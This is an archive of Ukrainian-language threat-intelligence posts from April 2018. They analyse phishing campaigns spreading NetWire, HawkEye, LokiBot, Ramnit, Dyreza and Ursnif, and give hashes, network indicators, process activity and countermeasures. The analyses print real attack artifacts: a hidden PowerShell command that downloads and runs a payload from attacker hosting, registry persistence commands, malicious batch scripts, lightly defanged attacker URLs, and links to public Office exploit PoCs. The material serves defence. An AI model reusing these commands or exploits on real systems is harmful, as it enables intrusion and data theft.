Archive | April 2018

IOC_NetWire_RAT_250418

Доброго дня, панове.

Детальний звіт по сьогоднішній розсилці.

Цього разу через документи із макросами розповсюджували #NetWire RAT.

Цей тип шкідливого коду застосовується для віддаленого керування інфікованими системами.

Рівень загрози, для організацій котрі не блокують макроси, – високий, а для тих, хто уважно читає наші поради – низький.

Трохи аналітики:

  • Документ із макросом розмістили на Amazon AWS (знову, для обходу URL фільтрації)
  • Активація макросу відбувається при кліку на формі (Ок або “Х”)
  • Payload не кодований (!This program cannot be run in DOS mode.)
  • Завантаження та запуск основної частини відбувається процесом winword
  • Основна частина зберігається у %Public% (фактично обходять %Temp%)
  • Не потребує прав Адміністратора

Інфікування відбувається так:


І так, проблеми будуть у тих, хто:

  • Не заблокували макроси (90% держ. установ та фінансових департаментів)
  • Не заборонили трафік для winword.exe (більше 50% організацій)
  • На блокують завантаження додатків з робочих систем (50% організацій)
  • Не блокують створення та запуск нових .exe з каталогів C:\Users\**\*.exe (70% установ)


Схема атаки:

email > URL > GET .doc > maco > GET 84.200.19.153/pen.exe > users\public\.exe

Маркери IOC:

файл приманка

SHA-256    16947cceab56ad5c98a588a23c656b8fc967702d027f8f9a0164bfc2738fc2b6
File name   Transactions_invalid001.doc
File size      425.5 KB

основна частина

SHA-256        079e3875726e57824b5357583a9ba746c5775a60c6355f5cced8024652817699
File name   pen.exe
File size      412 KB

Мережеві IOC:

Документ завантажується із Amazon AWS: (Увага! Посилання досі активне!)

h11ps://secured-banking00129.s3.amazonaws{.} com/Transactions_invalid001.doc

Основна частина завантажується із:

84.200.19.153    GET /pen.exe HTTP/1.1         Mozilla/4.0

Трафік скомпрометованої системи після запуску основної частини:

185.117.74.8      49622 → 4590 [SYN] Seq=0 Win=8192 Len=0 MSS=1460 WS=256 SACK_PERM=1    TCP   66    

Активність по процесам:

Коли жертва відкриває завантажений документ-приманку запускається макрос.

Процес Winword відкриває з’єднання із 84.200.19.153 і намагається завантажити некодований payload.

Завантажений файл записується та запускається з каталогу %Public%

"C:\Program Files\Microsoft Office\Office12\WINWORD.EXE" /n /dde
"C:\Users\operator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\...\pen[1].exe"
"C:\Users\Public\.exe"

Після запуску основна частина закріплюється через HKU:

[HKEY_USERS\S-xxx\Software\Microsoft\Windows\CurrentVersion\Run]
@="C:\\Users\\Public\\.exe"
"printer"="C:\\Users\\Public\\.exe"

(Default)    c:\users\public\.exe     4/24/2018 4:12 PM     
printer      c:\users\public\.exe     4/24/2018 4:12 PM 

Після запуску зразок відправляє SYN пакети на порт 4590 хоста 185.117.74.8:

185.117.74.8      49622 → 4590 [SYN]

Контрзаходи:

  • Перевірити журнали обладнання на наявність спроб комунікації із s3.amazonaws{.} com
  • Заборонити запуск макросів, якщо не використовуєте по роботі
  • Заборонити мережевий трафік для додатків MS Office – правило вбудованого брандмауеру (по аналогії з варіант1)
  • Заборонити запуск дочірніх процесів для додатків MS Office (крім служби друку) користувацьке правило Access Protection (McAfee ENS)
  • Чіткий контроль та блокування спроб зміни списку автозавантаження – нагадую про вбудовані можливості McAfee ENS – правила Access Protection
  • Заборона створення та зчитування/запуску *.EXE файлів з каталогів профілю C:\Users\**\
  • Моніторинг (хоча б) та\або блокування створення (або хоча би запуску) нових *.EXE файлів у каталозі C:\Windows\Temp\**
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR
Advertisements

Application Control standalone how-to

Доброго ранку, панове.

На ваші численні прохання наш фахівець Олег Лободін підготував коротку інструкцію з налаштування McAfee Application Control.

Це рішення застосовується для заборони запуску будь якого несанкціонованого коду (скрипти, додатки та інше).

 

Інструкція у вигляді PDF файлу (~ 350 KB) доступна за посиланням: McAfee AC Standalone

 

Справа у тому, що частина організацій, які користуються захистом кінцевих точок McAfee, мають ліцензії і на цей модуль також.

Але його використання вимагає певної послідовності дій, а більшість для простоти обирають лише антивірус.

Інструкція буде корисна тим, кому необхідно налаштувати контроль запуску додатків у закритих ланках мережі, без доступу до консолі еРО.

 

Будемо вдячні за критику, зауваження та ваші побажання.

Залишайтесь з нами. Попереду ще багато цікавого та важливого контенту.

Будьте уважні та обережні.

VR

IOC_HawkEye_110418

Доброго вечора, панове.

 

Візьміть до уваги. Нетипова схема доставки.

Вчора було зафіксовано спроби доставки #HawkEye (keylogger).

Зразки взяли у James_inthe_box та DissectMalware

Цей тип шкідливого коду застосовується для перехоплення вводу з клавіатури, відтак крадіжки облікових даних.

Рівень загрози – середній, а для тих, хто уважно читає наші поради – низький.

 

Наполегливо рекомендуємо вам перевірити реакцію ваших систем захисту на застосування PoC вразливостей які були використані:

https://github.com/bhdresh/CVE-2017-0199

https://github.com/Ridter/CVE-2017-11882

https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload—powershell-wget—execute

https://gist.github.com/Voraka/f66b19e2f4c1edbb76dcf67ba82731d2

 

Трохи аналітики:

  • Приманки та payload розміщені на серверах Amazon AWS (білий список для 90% URL-фільтрів)
  • Початковий .docx файл містить в одному із ресурсних .xml посилання на .rtf з вразливістю редактору формул
  • Вразливість редактору формул застосовується для завантаження та виконання .hta файлу
  • .hta містить інструкції для PowerShell, який нарешті завантажує основну частину
  • Основна частина зберігається на диск у Windows\Temp (не користувацька змінна оточення %temp%)
  • .hta чітко регламентує ім’я та шлях за яким буде збережена основна частина
  • Закріплення через HKCU але не Run, а WinNT\Load
  • Winword не генерує дочірніх процесів
  • Виклик powershell від імені mshta.exe
  • Не потребує прав Адміністратора
  • Основне тіло детектується ENS по DAT та GTI

Процес інфікування:


Схема атаки:

Email Attach (.DOCX) > OLE (17-0199) > GET .RTF > EQUENETD (17-11882) > 
HTA > PowerShell > GET payload > Windows\temp\shell.exe

 

Маркери IOC:

#1DOCX файл що містить посилання на RTF у xml:

SHA-256        93f29c160c9ead39ebfdc2ba17206ffeb02f0799253e500084b924f74518a68a
File name   Transfer Slip.docx (MS Word 2007 Document)
File size      12.52 KB

#2RTF файл що завантажується при відкритті попереднього DOCX:

SHA-256    1eb959c96b50de38189117ec78f4bf0bfb1c88427b44878b9f8647e2219ff8fd
File name   Zubyxxxx.doc (RTF)
File size      8.39 KB

#3HTA файл який завантажується при обробці попереднього RTF:

SHA-256    70629aadd17c9ff9c816f016a53cb99eaa43e9f91b9d66601cc4f983587c5fe2
File name   zubyxxx.hta
File size      327 B

#4Основна частина яка звантажуєтеся засобами powershell при обробці HTA файлу

SHA-256        9dbd5e1f540172ffc3a935902ca30a7f7826b1893a203333121ce312f94cb0a3
File name   unzubyxxx.exe >> windows/temp/shell.exe
File size      689.07 KB

#5Модуль основної частини що записується після активації попереднього файлу

SHA-256        36187849e720c376f2b3898cc5d4ae3188f7745be07391a66df080889d4ee12f
File name   .exe
File size      502.5 KB

 

Мережеві IOC:

Компоненти атаки завантажуються з серверів Amazon AWS:

(Увага! Станом на 12/04 посилання досі активні!)

h11p:\ s3.amazonaws{.} com/rewqqq/Zubyxxxx.doc
h11ps:\ s3.amazonaws{.} com/rewqqq/drss/zubyxxx.hta
h11ps:\ s3.amazonaws{.} com/rewqqq/drss/unzubyxxx.exe

Трафік скомпрометованої системи – перевірка Public IP:

104.16.17.96      whatismyipaddress{.} com        GET / HTTP/1.1

Трафік процесів після закріплення:

.exe                49553        104.16.17.96      80        CLOSE_WAIT                                                                             
.exe                49557        159.8.9.177        587        ESTABLISHED                                                                            
svchost.exe         49554        93.184.220.29    80        ESTABLISHED                                                                            
svchost.exe         49555        104.31.74.124    80        ESTABLISHED                                                                            
svchost.exe         49556        178.18.231.96    80        ESTABLISHED                                                                            
WINWORD.EXE         49546        52.216.100.181   80        CLOSE_WAIT   

 

Активність по процесам:

Коли жертва відкриває початковий DOCX файл, спрацьовує вразливість 17-0199.

Процес Winword відкриває з’єднання із Amazon AWS і намагається завантажити RTF файл.

Посилання на другий файл у компоненті document.xml.rels:

<?xml version=”1.0″ encoding=”UTF-8″ standalone=”yes”?>

<…

Target=”h11p:\ s3.amazonaws{.} com/rewqqq/Zubyxxxx.doc” TargetMode=”External”/><Relationship Id=”rId4″

</Relationships>

Щойно починається обробка другого документу – через вразливість редактору формул відбувається завантаження інструкцій у вигляді HTA файлу (html application):

"C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
C:\Windows\SysWOW64\mshta.exe h11ps:\ s3.amazonaws{.} com/rewqqq/drss/zubyxxx.hta

Зміст zubyxxx.hta:

 a=new ActiveXObject(“WScript.Shell”);

a.run(‘%SystemRoot%/system32/WindowsPowerShell/v1.0/powershell.exe -windowstyle hidden (new-object System.Net.WebClient).

DownloadFile(\’h11ps:\ s3.amazonaws{.} com/rewqqq/drss/unzubyxxx.exe\’, \’c:/windows/temp/shell.exe\’); c:/windows/temp/shell.exe’, 0);window.close();

Обробка HTA призводить до завантаження та запуску основної частини засобами PowerShell:

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden (new-object System.Net.WebClient).
DownloadFile('h11ps:\ s3.amazonaws{.} com/rewqqq/drss/unzubyxxx.exe', 'c:/windows/temp/shell.exe'); c:/windows/temp/shell.exe
"C:\windows\temp\shell.exe"

Після запуску основної частини проходить закріплення через HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load

C:\Windows\SysWOW64\cmd.exe reg  add "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" 
/v Load /t REG_SZ /d "C:\tmp\FolderN\name.exe.lnk" /f                       

Зміст ярлика name.exe.LNK:

C:\Users\operator\AppData\Local\Temp\FolderN\name.exe

Основна частина видобуває менший модуль, який залишається стежити за активністю користувача:

"C:\Users\operator\AppData\Local\Temp\tmp.exe"
"C:\tmp\.exe"

Збір інформації через vbc.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\tmp\holdermail.txt"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\tmp\holderwb.txt"

Перезапуск основного модулю через задані проміжки часу через .bat

C:\Windows\SysWOW64\cmd.exe cmd /c C:\Users\operator\AppData\Local\Temp\FolderN\name.exe.bat
timeout  /t 300

Зміст name.exe.bat

:_Start

timeout /t 300

tasklist /nh /fi “imagename eq .exe” | find /i “.exe” >nul && (

Goto _Start

) || (

Start /W “” “C:\Users\operator\AppData\Local\Temp\FolderN\name.exe”

Goto _Start

)

 

Висновки:

  1. Доволі складна та заплутана схема, проте для тих, хто не вжив належних заходів (див. нижче) може становити реальну загрозу
  2. Нестандартні шляхи запису та розпаковки – спроба обійти AppLocker, Software Restriction Policy
  3. Елементи атаки розміщені на довіреному для більшості ресурсі
  4. Ланка (docx > rtf > hta) дозволяє маніпулювати змістом проміжних файлів
  5. На системах де змінна оточення %temp% нестандартна – закріплення буде відбуватися із помилками
  6. Чим заплутаніша схема доставки ти більше ймовірність її поламати якщо запровадити контрзаходи, які ми вже не раз розглядали
  7. До запису основної частини на диск та її запуску (крок виконання powershell) можна 9-ма різними способами захистити систему (див. нижче)

 

Контрзаходи:

  • Перевірити журнали обладнання на наявність спроб комунікації із s3.amazonaws{.} com/rewqqq
  • Розгортання оновлень пакету MS Office, особливо виправлень для 17-0199 та 17-11882
  • Заборонити мережевий трафік для додатків MS Office – правило вбудованого брандмауеру (по аналогії з варіант1)
  • Заборонити запуск редактору формул – GPO або користувацьке правило Access Protection (McAfee ENS)
  • Або заборона запуску дочірніх процесів для редактору формул користувацьке правило Access Protection (McAfee ENS)
  • Заборонити мережевий трафік для mshta.exe та powershell.exe (по аналогії з варіант1)
  • Чіткий контроль та блокування спроб зміни списку автозавантаження – нагадую про вбудовані можливості McAfee ENS – правила Access Protection
  • Контроль над викликами PowerShell – вбудовані можливості McAfee ENS (сигнатури Exploit Prevention)
  • Заборона створення та зчитування/запуску *.EXE файлів з каталогів профілю C:\Users\**\
  • Моніторинг (хоча б) та\або блокування створення (або хоча би запуску) нових *.EXE файлів у каталозі C:\Windows\Temp\**
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

IOC_ACE_0504-0604-18

Доброго ранку, панове.

Перед Великоднем на аналіз було надано два зразки: #lokibot та #ramnit

Обидва типи можуть застосовуватися для стеження, крадіжки облікових даних.

Рівень загрози – низький.

Трохи аналітики:

  • Обидва розповсюджувалися через масовий неперсоналізований фішинг в оболонці ACE архівів
  • В зоні ризику – користувачі WinZip, WinRAR та плагінів Total Commander
  • 7zip та вбудований архіватор по замовчуванню не відкривають АСЕ
  • #lokibot іде з розширенням .SCR – перевірте чи у вас блокується створення/запуск
  • Зловмисники комбінують способи доставки
  • Щоб обійти фільтри застосовують застарілі формати (ACE, gz, RAR v5 та інші)
  • Не потребує прав Адміністратора
  • #lokibot дає чіткий слід по мережі, а #ramnit запускає бравзер з метою приховати комунікації з С2
  • Основне тіло обох зразків детектується ENS по GTI / DAT

Схема атаки:

email > Attach (ACE) > \tmp\ *.exe (.scr)

Розпаковка обгортки одного із приєднань. Зверніть увагу на розширення payload!

 

Маркери IOC:

#lokibot

приклад фішингового листа:

SHA-256        f20d4d4c465f65b36a17a3f08921e304a66a656ae5f5b70dc39e51345013445a
File name   DHL BILL OF LADING SHIPPING DELIVERY INVOICE.ace
File size      287.39 KB

 

SHA-256        d3c61a42abc8b612cec5746b665d1ae47c95de01f11a8e88b60dfa2f57e215a4
File name   DHL BILL OF LADING SHIPPING DELIVERY INVOICE.scr (.exe .bin)
File size      641 KB

 

195.123.238.10   POST /okto/fre.php HTTP/1.0     Mozilla/4.08 (Charon; Inferno)

# # # # # # #

#ramnit

приклад фішингового листа:

SHA-256    822a6f8c74d0f89f8fa202eba3c914eb339c7cccba922ee818cf04b9a2cb9bf2
File name   po-new order_pdf.exe
File size      1.02 MB

 

SHA-256        9f62f582fc02ae7b3b5df9a8a90718a80773eed10828014cee2a938976ab056b
File name   ramnitmgr.exe
File size      220 KB

 

[System Process] waw02s07-in-f174.1e100.net http        TIME_WAIT                                                                       
[System Process] 93.184.220.29              http        TIME_WAIT

 

Контрзаходи:

  • Жорсткий фільтр передачі запускних файлів (не лише .EXE (!)) по каналам Web та Email
  • Заборона передачі ACE архівів (якщо не потрібно по роботі) по каналам Web та Email
  • Чіткий контроль та блокування спроб зміни списку автозавантаження – нагадую про вбудовані можливості McAfee ENS – правила Access Protection
  • Заборона створення та зчитування/запуску *.EXE та *.SCR файлів з каталогів профілю C:\Users\**\ ! – правила Access Protection
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

IOC_Dyreza_040418

Доброго дня, панове.

Вчора було зафіксовано випадок інфікування застарілим(!) шкідливим кодом типу #Dyreza.

Dyreza був основою для створення уже відомого нам #trickbot

Зразок доволі застарілий, проте його спосіб дії має важливі відмінності від типових загроз.

Вирішили ознайомити вас із результатами аналізу та підкреслити прості контрзаходи.

Рівень загрози – низький, особливо для тих, хто уважно читає наші поради.

Трохи аналітики:

  • Пік активності Dyreza (або Dyre чи Dyzap) припадав на кінець 2014 – початок 2015
  • Розмір зразків (9 та 5 Мб) говорять про відсутність оптимізації коду (зараз 90% payload <= 2 Мб)
  • Вперше такий код було помічено дослідниками наприкінці 2012го року, User Agent також говорить сам за себе
  • Зразок використовує застарілу версію Twitter REST API для пошуку конфігурацій (був деактивований ще в травні 13го)
  • Тобто практичне застосування даного зразка могло проходити 12/2012 – 7/2013
  • Отже мова не й де про складну, цільову атаку, це радше своєрідний “привіт із минулого”
  • Це причина зайвий раз згадати, що варто дуже обережно обробляти застарілі документи/листи/накопичувачі
  • Не дивлячись на маскування та закріплення зразок не становить серйозної загрози
  • Наданий зразок перевіряє наявність української локалізації ОС
  • Не потребує прав Адміністратора
  • Основне тіло детектується ENS по GTI

 

Активність зразка по Users:

Активність зразка по ProgramData:

Активність зразка по Temp:

 

Схема атаки:

Вектор доставки не встановлено (швидше за все архів або документ) 

> redist.exe > \Program Data\%Random%\ alg.exe

Маркери IOC:

Перша частина:

SHA-256        9e045caf5a4cb9ea88549ad47d1f23db371cfdd8298d0613450bc04be414d224
File name   redist.exe – може приймати довільну назву мімікруючи під встановлене прикладне ПЗ!
File size      9.76 MB

Друга частина, що видобувається із першої:

SHA-256        51a9a1b1d09bdf4aae1f0fde9f762d31c99979dfa957e2d803fd0dd3eaa0ba5a
File name   alg.exe – може приймати довільну назву мімікруючи під встановлене прикладне ПЗ!
File size      5.1 MB

Мережеві IOC:

Трафік скомпрометованої системи:

199.16.156.41    search.twitter.com       
GET /search.json?q=Mountain_sky&rpp=50        
Mozilla/5.0 Gecko/20100101 Firefox/4.0

Зміст пакетів:

запит

GET /search.json?q=Mountain_sky&rpp=50 HTTP/1.1
Host: search.twitter{.} com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:2.0) Gecko/20100101 Firefox/4.0
Referer: h11p://search.twitter{.} com/
Connection: close
Accept-Encoding: identity

відповідь

{"errors":[{"message":"The Twitter REST API v1 is no longer active. 
Please migrate to API v1.1. h11ps://dev.twitter{.} com/docs/api/1.1/overview.","code":64}]}

Активність по процесам:

Запуск першої частини призводить до її копіювання одразу за кількома шляхами в каталозі \Program Data\

Після копіювання свого тіла він видобуває меншу частину яка і буде відповідати за закріплення в системі, а початковий процес завершує.

"C:\Users\operator\Desktop\redist.exe"

C:\ProgramData\install.res.exe
C:\ProgramData\Adobe\wrt0054.exe
C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AB0000000001}\setup.exe
C:\ProgramData\DAEMON Tools Lite\wrt0050.exe
C:\ProgramData\Package Cache\{5d0723d3-cff7-4e07-8d0b-ada737deb5e6}\vcredist_x64.exe

C:\ProgramData\Skype\dsiwmis.exe (менша частина)

C:\ProgramData\Skype\install.res.52.exe
C:\ProgramData\Sun\redist.exe

Закріплення через HKCU

(досить недбало – Flash Player з каталогу Skype?!, проте пересічний користувач не помітить особливої різниці)

При кожному запуску імена генеруються довільно.

Adobe Flash Player Update                    c:\programdata\skype\dsiwmis.exe        10.11.2008 12:40

 

Артефакти зразка, були надані @James_inthe_box

{"bc/aliases":
{"7z": "ex del a.zip_&and&_ex 7z.exe a a.zip {0}",
"_scr": "ex c.exe /f o.jpg_&and&_rg o.jpg o.jpg_&and&_ex del o.jpg",
"scr": "ex c.exe /f o.jpg_&and&_rg o.jpg o.jpg_&and&_ex del o.jpg_&filter&_h11p://rghost\\.ru/\\d+"}
, "bc/coding": {"ex": ["cp1251", "cp866"]}}

one got lost, two got frost, third has gone to lord, what with fourth? he's made of doors

search.json?q=Mountain_sky&rpp=50

system32\uk-UA\sppsvc.exe

util/bot_conf
FINISHED BOT TRY
ENDED BOT TRIES
EXTRACTING '%s'
UPDATE CYCLE IS
SAVING NEW SETTINGS
0aU,
update_cycle
iteration_number
next_bot_conf
version_bot_conf
homie\main.py
chatter.webchat
make_scanner

Контрзаходи:

  • Перевірити журнали обладнання на наявність спроб комунікації із search.twitter.com  GET /search.json?q=Mountain_sky&rpp=50
  • При роботі із старими/архівними документами, листами чи носіями дотримуватися максимальної обережності (перевіряти файли та їх репутацію)
  • Суворо контролювати вихідний трафік клієнтських систем, блокуючи різноманітні API запити, які не потрібні для штатної роботи користувачів
  • Чіткий контроль та блокування спроб зміни списку автозавантаження – нагадую про вбудовані можливості McAfee ENS – правила Access Protection
  • Заборона створення та зчитування/запуску *.EXE файлів з каталогів профілю C:\Users\**\ ! – правила Access Protection
  • Моніторинг (хоча б) та\або блокування створення (або хоча би запуску) нових *.EXE файлів у каталозі C:\ProgramData\**
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

IOC_ursnif_020418

Доброго вечора, панове.

Вчора була зафіксована розсилка шкідливого коду типу #ursnif.

Рівень загрози – середній. Для тих, хто уважно читає наші поради – низький.

Лист, який було надано на аналіз стосується начебто заборгованості приватній компанії:

Минулого разу в якості претексту було взято звернення від ДФС.

Трохи аналітики:

  • Основний документ – RTF файл із вразливістю CVE-2017-8570
  • Основний документ містить кілька .bat файлів та основне тіло #ursnif та другий RTF документ (щоб відвести очі)
  • Перший (основний) документ також містить DDE лінк
  • Крім того основний документ експлуатує вразливість редактору формул 11882
  • Виправлення на 11882 не зупиняє процес інфікування
  • bat файл чітко регламентує шлях та ім’я основної частини
  • Додаткові модулі завантажуються з того ж серверу що і минулого разу
  • Не потребує прав Адміністратора
  • Основне тіло детектується ENS по GTI

Схема атаки:

email > URL > (DOC) ZIP > WINWORD > CMD > BAT > %temp%\exe.exe

Процес інфікування:

Маркери IOC:

Архів:

SHA-256        2b5d2e9fcb3513a7dd5a4713351edd10d3a8fff94f0405c178499d62b22c428a
File name   Копія_договору_№82910.zip
File size      514.43 KB

Документ приманка:

SHA-256        650813970c1182faab8c3eaf1bc2f1f1025ea85c60b3470296cea70e486561b2
File name   Dogovir copy № 82910.doc
File size      1.35 MB

Основна частина:

SHA-256        d6d81a58fcf3131ede03d6a1e3e96a813ea0494edf98be2f15363f022115bede
File name   exe.exe
File size      596 KB

Мережеві IOC:

завантаження архіву з документів (на сьогодні вже не активна)

185.117.72.168           h11p:\wonderingethome{.} com/dog_31682_hgbqjlcpe

Трафік скомпрометованої системи:

49.51.136.34      HTTP 186   providedatheyfromyouthe{.} club  GET /new/x32.bin HTTP/1.1    - так само як минулого разу

140.211.11.105   HTTP 185   www.apache{.} org     GET /licenses/LICENSE-2.0.txt HTTP/1.1    - шум для відволікання уваги

Комунікація через ноди Tor

199.254.238.52   HTTP 128   199.254.238.52   GET /tor/status-vote/current/consensus HTTP/1.0 Continuation
171.25.193.9      HTTP 126   171.25.193.9      GET /tor/status-vote/current/consensus HTTP/1.0 Continuation
78.47.14.4         HTTP 145   78.47.14.4         GET /tor/server/fp/bce02e4a73b6cf72f3855470e353060d85f6bd45 HTTP/1.0 Continuation
193.23.244.244   HTTP 128   193.23.244.244   GET /tor/status-vote/current/consensus HTTP/1.0 Continuation
185.107.83.71    HTTP 148   185.107.83.71    GET /tor/server/fp/59ce9f0403705b48f435ac90efc96b68f5fb84ad HTTP/1.0 Continuation
188.32.129.93    HTTP 148   188.32.129.93    GET /tor/server/fp/334cadf78800e0f14a7438ef45f81623e386e917 HTTP/1.0 Continuation
37.59.118.7        HTTP 146   37.59.118.7        GET /tor/server/fp/1ac9f76a39eca548b81266ab5f60fe6d263753cc HTTP/1.0 Continuation
82.94.251.203    HTTP 127   82.94.251.203    GET /tor/status-vote/current/consensus HTTP/1.0 Continuation
199.254.238.52   HTTP 128   199.254.238.52   GET /tor/status-vote/current/consensus HTTP/1.0 Continuation
82.94.251.203    HTTP 127   82.94.251.203    GET /tor/status-vote/current/consensus HTTP/1.0 Continuation
82.94.251.203    HTTP 127   82.94.251.203    GET /tor/status-vote/current/consensus HTTP/1.0 Continuation
86.59.21.38        HTTP 125   86.59.21.38        GET /tor/status-vote/current/consensus HTTP/1.0 Continuation

Активність по процесам:

Запуск документу-приманки ініціює CVE-2017-8570 – процес Winword видобуває вміст у %temp% і починає процес інфікування

В процесі запуску основний файл закривається, реєстр системи модифікується і користувачеві виводиться RTF файл decoy.doc

"C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
"C:\Windows\System32\cmd.exe" /C C:\tmp\tAsK.bAt
C:\Windows\system32\cmd.exe  /K C:\tmp\2nd.bat

Зміст task.bat

ECHO OFF
set uu="%TMp%\block.txt"
IF EXIST %uu% (exit) ELSE (set uu="%TMp%\block.txt" & copy NUL %uu% & start /b %TMp%\2nd.bat)
Del task.bat
exit

Зміст 2nd.bat

ECHO OFF
TIMEOUT 1
start %TeMp%\ExE.ExE
set "App=winword.exe"
TASKKILL /F /IM %App%
reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\8.0 – 16.0\Word\Resiliency /f
for /f "tokens=1* delims=\*" %%a in ('REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\8.0 – 16.0 \Word\File MRU" /v "Item 1"') do set "AppPath=%%~b"
copy %TeMp%\DeCoY.DoC "%AppPath%"
"%AppPath%"
DeL %tMp%\Block.TxT
DeL %tMp%\Inteldriverupd1.ScT

Продовження активності

Запуск основної частини, зупинка MS Word, видалення ключів реєстру та відображення другого RTF документу decoy.doc

C:\Windows\SysWOW64\timeout.exe 1
C:\tmp\ExE.ExE
C:\Windows\SysWOW64\reg.exe delete HKEY_CURRENT_USER\Software\Microsoft\Office\8-16.0\Word\Resiliency /f
C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\8.0\Word\File MRU" /v "Item 1"
C:\Windows\SysWOW64\reg.exe REG  QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\8.0\Word\File MRU" /v "Item 1"
"C:\Windows\System32\cmd.exe" /C C:\tmp\tAsK.bAt

Контрзаходи:

  • Чіткий контроль та блокування спроб зміни списку автозавантаження – нагадую про вбудовані можливості McAfee ENS – правила Access Protection
  • Заборона створення та зчитування/запуску *.BAT та *.EXE файлів з каталогів профілю C:\Users\**\ !
  • Заборона запуску дочірніх процесів для додатків MS Office – правила Access Protection
  • Встановлення виправлень CVE-2017-8570 та CVE-2017-11882
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

PS

Покроково:



VR